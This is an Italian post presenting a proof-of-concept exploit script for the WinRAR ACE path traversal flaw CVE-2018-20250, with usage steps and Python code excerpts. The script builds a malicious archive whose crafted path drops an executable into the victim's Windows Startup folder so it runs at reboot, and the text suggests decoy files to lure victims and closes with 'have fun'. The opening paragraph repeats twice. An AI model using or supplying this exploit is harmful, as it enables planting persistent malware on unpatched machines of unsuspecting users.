
WinRar è un software molto conosciuto per Windows. Una versione precedente di WinRaR presentava una vulnerabilità che è stata corretta a Febbraio 2019. La maggior parte delle persone non ha aggiornato winrar, quindi sono vulnerabili a questo bug di attraversamento del percorso assoluto [CVE-2018-20250]
WinRar è un software molto conosciuto per Windows. La versione precedente di WinRaR presentava una vulnerabilità che è stata corretta a Febbraio 2019. La maggior parte delle persone non ha aggiornato WinRar, quindi sono vulnerabili a questo bug di Absolute Path Traversal [CVE-2018-20250]
exploit per Estrarre l'esecuzione di codice da Winrar
poc di Ridter
come si usa ?
ti basta installare python 3.7, preparare un file malevolo da eseguire, impostare i valori desiderati, questo script exploit genererà automaticamente il file di archivio malevolo!
... ...
# The archive filename you want
rar_filename = "test.rar"
# The evil file you want to run
evil_filename = "calc.exe"
# The decompression path you want, such shown below
target_filename = r"C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hi.exe"
# Other files to be displayed when the victim opens the winrar
# filename_list=[]
filename_list = ["hello.txt", "world.txt"]
... ...
def get_right_hdr_crc(filename):
# This command may be different, it depends on the your Python3 environment.
p = os.popen('py -3 acefile.py --headers %s'%(filename))
res = p.read()
pattern = re.compile('right_hdr_crc : 0x(.*?) | struct')
result = pattern.findall(res)
right_hdr_crc = result[0].upper()
return hex2raw4(right_hdr_crc)
... ...
test.rartest.rar, vedrà i file hello.txt e world.txt; puoi anche aggiungere più file, file più attraenti.![]()
hi.exe, che in realtà è calc.exe. quando riavvia il computer, hi.exe verrà eseguito.![]()
divertiti! :)